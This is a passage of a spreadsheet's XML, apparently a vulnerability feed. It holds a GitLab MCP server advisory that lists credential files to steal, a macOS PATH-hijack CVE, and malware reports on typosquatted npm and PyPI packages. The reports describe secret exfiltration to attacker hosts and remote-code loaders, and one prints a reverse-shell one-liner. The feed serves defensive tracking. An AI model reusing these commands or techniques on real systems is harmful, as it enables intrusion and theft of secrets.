**Other exfiltrable targets (running as root in Docker):**
| File | Contents |
|---|---|
| `/proc/self/environ` | All env vars including `GITLAB_PERSONAL_ACCESS_TOKEN=glpat-xxxxx` |
| `/proc/self/cmdline` | Command line args (token if passed via CLI) |
| `/etc/shadow` | System password hashes |
| `/app/build/index.js` | Full application source code |
| `~/.gitlab-mcp-token.json` | OAuth tokens (if OAuth mode was used) |
### Impact
**Unauthenticated full GitLab account takeover.** Any attacker with network access to the MCP server port can steal the Personal Access Token and gain complete access to the GitLab instance as the token owner - including all repositories, CI/CD secrets and variables, deploy keys, project settings, and admin functions if the user has admin privileges. No credentials or user interaction are required. This is the default configuration for Docker deployments</t>
        </is>
      </c>
      <c r="S29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61560</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81192</t>
        </is>
      </c>
      <c r="D30" s="5" t="inlineStr"/>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr"/>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr">
        <is>
          <t>nuget:OpenTelemetry.Resources.Host</t>
        </is>
      </c>
      <c r="M30" s="5" t="inlineStr">
        <is>
          <t>1.16.0-beta.2</t>
        </is>
      </c>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr"/>
      <c r="P30" s="5" t="inlineStr"/>
      <c r="Q30" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>### Summary
The `OpenTelemetry.Resources.Host` NuGet package is affected by an untrusted search path vulnerability on macOS. The `host.id` resource attribute detector launches the `sh` and `ioreg` executables by bare name rather than by absolute path, so both are resolved
through the `PATH` environment variable.
A local attacker who is less privileged than the host application, and who can influence `PATH` or write to a directory that appears in `PATH` ahead of the system directories, can have an arbitrary binary executed in the application's security context, resulting in local
code execution/privilege escalation.
### Details
The implementation of the host detector macOS has always invoked `ioreg` and `sh` via their bare names since it was implemented by [open-telemetry/opentelemetry-dotnet-contrib#1631](https://github.com/open-telemetry/opentelemetry-dotnet-contrib/pull/1631).
The vulnerability was fixed by [open-telemetry/opentelemetry-dotnet-contrib#4760](https://github.com/open-telemetry/opentelemetry-dotnet-contrib/pull/4760) which executes `ioreg` directly using its absolute path.
### Impact
Applications running on **macOS** that use the `OpenTelemetry.Resources.Host` detector when an attacker who is *less privileged* than the application process can influence `PATH` or write to a `PATH` directory that precedes the system directories (e.g. a higher-privileged service with a user-writable directory in its search path, or a process inheriting an attacker-influenced environment). The attacker gains code execution in the application's security context through an attacker-controlled `ioreg` executable.
### Mitigation
This vulnerability only affect macOS hosts - Linux and Windows hosts are unaffected.
### Workarounds
None known.
### References
- [GHSA-9h8m-3fm2-qjrq](https://github.com/open-telemetry/opentelemetry-go/security/advisories/GHSA-9h8m-3fm2-qjrq)
- [open-telemetry/opentelemetry-dotnet-contrib#4760](https://github.com/open-telemetry/opentelemetry-dotnet-contrib/pull/4760)
- [CWE-426](https://cwe.mitre.org/data/definitions/426.html)</t>
        </is>
      </c>
      <c r="S30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81192</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>GHSA-4rmp-vchm-9gvg</t>
        </is>
      </c>
      <c r="D31" s="5" t="inlineStr"/>
      <c r="E31" s="5" t="inlineStr"/>
      <c r="F31" s="5" t="inlineStr"/>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="inlineStr"/>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr"/>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr">
        <is>
          <t>npm:kartyk-github-token-pkg</t>
        </is>
      </c>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr"/>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (3cf7fd25b60cd680892113ab7de697ebe897542c013c8c4a977bb4852a593619)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S31" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16246</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>GHSA-4vpr-3r9p-p9fh</t>
        </is>
      </c>
      <c r="D32" s="5" t="inlineStr"/>
      <c r="E32" s="5" t="inlineStr"/>
      <c r="F32" s="5" t="inlineStr"/>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="inlineStr"/>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr"/>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr">
        <is>
          <t>npm:kartyk-github-single-ver-pkg</t>
        </is>
      </c>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr"/>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (dc583cefb03bc649c96d2e8b48cc2bd5d73d8f6c489ded9b46c217ba1f212ddb)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S32" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16245</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>GHSA-4vxh-7998-9h4g</t>
        </is>
      </c>
      <c r="D33" s="5" t="inlineStr"/>
      <c r="E33" s="5" t="inlineStr"/>
      <c r="F33" s="5" t="inlineStr"/>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="inlineStr"/>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr">
        <is>
          <t>npm:kartyk-github-oidc-test-pkg</t>
        </is>
      </c>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr"/>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (1c0bc4570b5c41bc6a589bf16daea1a90f52e57b878fe6219afb1102ec24c535)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S33" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16244</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>GHSA-63f3-rmrf-6m9q</t>
        </is>
      </c>
      <c r="D34" s="5" t="inlineStr"/>
      <c r="E34" s="5" t="inlineStr"/>
      <c r="F34" s="5" t="inlineStr"/>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="inlineStr"/>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr">
        <is>
          <t>npm:pkg-rollback-dreed-viced-sonic-ponds</t>
        </is>
      </c>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr"/>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (d5c66c5e78670d2099776492aa1a836a031eea3a9d43b2ffe5911a19b62c71d4)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S34" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16247</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16204</t>
        </is>
      </c>
      <c r="D35" s="5" t="inlineStr"/>
      <c r="E35" s="5" t="inlineStr"/>
      <c r="F35" s="5" t="inlineStr"/>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="inlineStr"/>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr"/>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr">
        <is>
          <t>npm:@prime0/alanced-match</t>
        </is>
      </c>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr"/>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (53d49bf28eb233bca0591b32c11b411d1c10b8e8f978d1b76c6df2e6a00772f3)
The package @prime0/alanced-match is a 1-character-drop typosquat of balanced-match. Its postinstall.js runs automatically on npm install and POSTs a host fingerprint (hostname, username, platform, arch, cwd, node version, pid, non-internal IP addresses, uptime, package name) to the hardcoded bare-IP endpoint http://69.48.229.140:8080/b. Its main entry index.js opens a require-time HTTP polling channel to the same host, retrieves JSON commands from /c every 30 seconds (with 10-minute re-beacons), executes them via child_process.exec, and posts stdout/stderr back to /r — providing full remote code execution on the installer's machine. A source comment self-identifies the code as a 'Minimal stealth agent' and 'typosquat'.
</t>
        </is>
      </c>
      <c r="S35" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16204</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16205</t>
        </is>
      </c>
      <c r="D36" s="5" t="inlineStr"/>
      <c r="E36" s="5" t="inlineStr"/>
      <c r="F36" s="5" t="inlineStr"/>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="inlineStr"/>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr"/>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr">
        <is>
          <t>npm:@prime0/inimatch</t>
        </is>
      </c>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr"/>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (d094698410f0146ad3f51ff8860d657ca28b5f55b77ef9593b637b956996180f)
@prime0/inimatch is a typosquat of minimatch that behaves as a stealth remote-access agent. postinstall.js runs on npm install and POSTs a host fingerprint (hostname, username, platform/arch, cwd, node version, pid, non-internal IPs, uptime, package name) to http://69.48.229.140:8080/b. index.js, on require(), beacons the same fingerprint to /b and then every 30 seconds polls http://69.48.229.140:8080/c?id=... for a JSON command, passes the returned command string to child_process.exec, and POSTs stdout/stderr back to /r, giving the operator of that host arbitrary shell execution on the installer's machine. A source comment self-identifies the package as a stealth-agent typosquat, while package.json advertises only a 'small utility'.
</t>
        </is>
      </c>
      <c r="S36" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16205</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16206</t>
        </is>
      </c>
      <c r="D37" s="5" t="inlineStr"/>
      <c r="E37" s="5" t="inlineStr"/>
      <c r="F37" s="5" t="inlineStr"/>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="inlineStr"/>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr"/>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr">
        <is>
          <t>npm:@prime0/pcomatch</t>
        </is>
      </c>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr"/>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (08299e41eb4feb9e324854bf5cd3386e6e52696b4b11443254374897a1ad3816)
index.js and the postinstall lifecycle script contact a hardcoded bare-IP endpoint at http://69.48.229.140:8080 over plain HTTP. On `npm install`, the postinstall hook collects host identifiers (hostname, username, platform, arch, cwd, node version, pid, all non-internal IP addresses, uptime, package name) and POSTs them as JSON to /b. On `require()` of the package main, the module beacons the same host, then polls /c every 30 seconds for JSON commands and executes the `c` field via child_process.exec, POSTing stdout/stderr back to /r. A source comment self-identifies the module as a stealth typosquat agent, while package.json advertises only a generic "small utility" description.
</t>
        </is>
      </c>
      <c r="S37" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16206</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16207</t>
        </is>
      </c>
      <c r="D38" s="5" t="inlineStr"/>
      <c r="E38" s="5" t="inlineStr"/>
      <c r="F38" s="5" t="inlineStr"/>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="inlineStr"/>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr"/>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr">
        <is>
          <t>npm:chai-as-agile</t>
        </is>
      </c>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr"/>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (90d46bc75e0c086e929855baefd9f9f847ebe6e85f8a004c9de72502d0fb6263)
On require('chai-as-agile'), index.js loads lib/initializeCaller.js which decodes a base64-obfuscated URL to https://ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df and POSTs the full contents of process.env to that endpoint with an 'x-secret-header' header. It then passes the HTTP response body to `new Function('require', response.data)` and invokes it with `require`, granting the endpoint operator arbitrary code execution in the consumer's Node process on every import. Any credentials present in the environment (AWS_*, GITHUB_TOKEN, NPM_TOKEN, CI secrets) are transmitted verbatim to the attacker. The package name resembles the popular 'chai' assertion library, consistent with a typosquat lure.
</t>
        </is>
      </c>
      <c r="S38" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16207</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16208</t>
        </is>
      </c>
      <c r="D39" s="5" t="inlineStr"/>
      <c r="E39" s="5" t="inlineStr"/>
      <c r="F39" s="5" t="inlineStr"/>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="inlineStr"/>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr"/>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr">
        <is>
          <t>npm:otel-span-adapter</t>
        </is>
      </c>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr"/>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (9e800a0d88fb9a757c0ca5ecc09f0217522e72575d3e570a87c167090740de7d)
The package presents itself as an OpenTelemetry span adapter but on module load schedules a bootstrap routine via setImmediate that reads /proc/self/environ, enumerates all process.env entries via Object.entries(process.env), captures hostname, user, and cwd, and POSTs the resulting JSON snapshot to a hardcoded webhook.site inbox at https://webhook.site/e640206f-2da1-494b-bc38-d4dc37200d8b. The destination URL is assembled at runtime by joining the parts ["https://", "webhook.site", "/e640206f-..."] rather than appearing as a single literal, concealing the host from plain string search. Any process that requires this package leaks its full environment — which for Node services routinely contains AWS/GCP keys, database URIs, API tokens, and CI secrets — plus the raw initial environment from /proc/self/environ, to a third-party collector inbox controlled by the publisher.
</t>
        </is>
      </c>
      <c r="S39" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16208</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16209</t>
        </is>
      </c>
      <c r="D40" s="5" t="inlineStr"/>
      <c r="E40" s="5" t="inlineStr"/>
      <c r="F40" s="5" t="inlineStr"/>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="inlineStr"/>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr"/>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-ccsuc-meeb</t>
        </is>
      </c>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr"/>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (8fb6207f1b4ec4d94c724583a5f32b85f68d203e1a9e6372705b410efbf9173a)
The package's postinstall lifecycle script (postinstall.js, wired via scripts.postinstall in package.json) checks the installer's hostname against a hardcoded allowlist value ('ubuntu-fc-uvm') and, on match, spawns /bin/bash with a reverse-shell one-liner opening an interactive TCP shell to 14.225.210.85:80. The script uses child_process.exec, includes retry logic and a 60-second timeout, and runs automatically on `npm install`. The hostname gate indicates a targeted-dropper shape aimed at specific installer environments; on matching hosts the operator obtains full interactive command execution on the installer's machine.
</t>
        </is>
      </c>
      <c r="S40" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16209</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16210</t>
        </is>
      </c>
      <c r="D41" s="5" t="inlineStr"/>
      <c r="E41" s="5" t="inlineStr"/>
      <c r="F41" s="5" t="inlineStr"/>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-pencc-meeb</t>
        </is>
      </c>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr"/>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (3b4277c223cb7d5a9b8c263570a18670ee5054779862fbb801024a55629aa208)
postinstall.js is registered as the package's postinstall script and runs automatically on npm install. It compares os.hostname() to the hardcoded string 'ubuntu-fc-uvm' and, on a match, executes `bash -c "bash -i &gt;&amp; /dev/tcp/14.225.210.85/80 0&gt;&amp;1"` via child_process, opening an interactive reverse shell to 14.225.210.85 on TCP port 80. The script includes retry logic and writes to /tmp/postinstall-revshell.log. The hostname gate suppresses activity on non-matching hosts, but the payload is shipped in every install of this version.
</t>
        </is>
      </c>
      <c r="S41" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16210</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16211</t>
        </is>
      </c>
      <c r="D42" s="5" t="inlineStr"/>
      <c r="E42" s="5" t="inlineStr"/>
      <c r="F42" s="5" t="inlineStr"/>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="inlineStr"/>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr"/>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr">
        <is>
          <t>npm:swnwall</t>
        </is>
      </c>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr"/>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (70fb3b7b76f32b1c101b04c15933b403658f199267e9c3c34ebea9aba917949a)
On require/import, index.js invokes initialize() which spawns loader.js as a detached, hidden background child process (detached: true, windowsHide: true, stdio: 'ignore', unref'd) and records a.pid file to avoid re-spawning. loader.js performs an HTTPS GET against https://api.npoint.io/641d37178a880b1e8b8f (a user-editable JSON hosting service), base64-decodes the `code` field of the response, and executes the decoded payload via `new Function("require",..., decodedCode)(require, __dirname, __filename,...)`, granting the fetched code full access to Node's require, filesystem, and process APIs on the installer's machine. loader.js additionally monkey-patches Module.prototype.require to force windowsHide on all child_process spawn calls and reroute execSync through a hidden `cmd.exe /c`, concealing further child-process activity. The remote payload is mutable and attacker-controllable via the npoint.io endpoint.
</t>
        </is>
      </c>
      <c r="S42" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16211</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16212</t>
        </is>
      </c>
      <c r="D43" s="5" t="inlineStr"/>
      <c r="E43" s="5" t="inlineStr"/>
      <c r="F43" s="5" t="inlineStr"/>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="inlineStr"/>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr"/>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr">
        <is>
          <t>PyPI:cli-anything-ai-market</t>
        </is>
      </c>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr"/>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c5319f74a06670d40b020831dae38da696aa966dc1fdfde45063abb0024df922)
setup.py runs automatically during `pip install` and POSTs the installer's OS, username (USER/USERNAME), and hostname (via COMPUTERNAME on Windows or the `hostname` command on POSIX) as form-encoded data to the hardcoded plaintext HTTP endpoint http://182.92.143.23/collect.php. The package declares `packages=[]` and ships no importable code implementing the advertised CLI, so the beacon is the sole install-time behavior. The destination is a bare-IP HTTP endpoint unrelated to any legitimate PyPI or vendor infrastructure, and the collected fields identify the installer's machine and account.
## Source: kam193 (102c2da9fcddf1e398e47d284721f74769e1b5f4c8806570b253a5cc426396e2)
Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose.
---
Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research &amp; co, with clearly low-harm possibilities.
Campaign: GENERIC-standard-pypi-install-pentest
Reasons (based on the campaign):
 - The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.
 - The package overrides the install command in setup.py to execute malicious code during installation.
</t>
        </is>
      </c>
      <c r="S43" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16212</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16213</t>
        </is>
      </c>
      <c r="D44" s="5" t="inlineStr"/>
      <c r="E44" s="5" t="inlineStr"/>
      <c r="F44" s="5" t="inlineStr"/>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="inlineStr"/>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr"/>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr">
        <is>
          <t>npm:discord-players</t>
        </is>
